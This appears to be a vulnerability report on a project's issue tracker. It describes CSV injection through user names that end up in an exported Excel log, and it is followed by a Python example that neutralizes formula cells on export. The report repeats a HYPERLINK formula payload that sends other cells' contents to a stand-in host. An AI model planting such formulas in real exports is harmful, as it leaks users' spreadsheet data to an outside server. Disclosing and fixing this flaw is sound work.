CSV Injection Vulnerability #35
Comments
Hello! Your email has been received, and I will reply as soon as possible. Have a nice day!
The product has a CSV injection vulnerability. The premise is that you need to be in the login state.

1. First create a low-privileged user
2. Log in to a low-privileged user and create a malicious user

Then send the package

Successfully added user named `=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")`

`.xlsx` file. Open the .xlsx log file, double-click the cell of `=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")`. Then click an empty cell. And then click the cell of `=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")`. In this case, a request is sent to localhost:8007.

First double-click the `=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")` cell

Click on a blank cell

Finally, clicking the original cell again will send a request to `localhost:8007` through the browser

It is recommended to shield the formula when exporting Excel to prevent the risk of CSV injection.
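One way to apply the recommended formula shielding at export time, as an added example that is not part of the original report or the project's code. The function names, the sample rows and the choice to write CSV with the standard library are assumptions; the page does not show how the project builds its .xlsx, but the same per-cell step would run before values are handed to the spreadsheet writer.

```python
import csv
import io
from urllib.parse import unquote

# Leading characters that make a spreadsheet treat a cell as a formula
# (the set listed in OWASP's CSV injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def neutralize_cell(value):
    """Return a value that a spreadsheet will store as text, not a formula.

    Non-string values (numbers, None) pass through unchanged. A string whose
    first character, or first character after leading whitespace (a
    conservative choice), is a trigger gets a leading apostrophe.
    """
    if not isinstance(value, str):
        return value
    if value.startswith(FORMULA_TRIGGERS) or value.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value

def export_rows(rows):
    """Serialize rows to CSV text with every cell neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()

# The user name from the report, URL-decoded the way a server would store it
# (%26 is "&", %2c is ",").
REPORTED_NAME = unquote('=HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")')

# Constructed sample data standing in for the exported user list.
SAMPLE_ROWS = [
    ["id", "username", "role"],
    [1, "alice", "user"],
    [2, REPORTED_NAME, "user"],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS))
```
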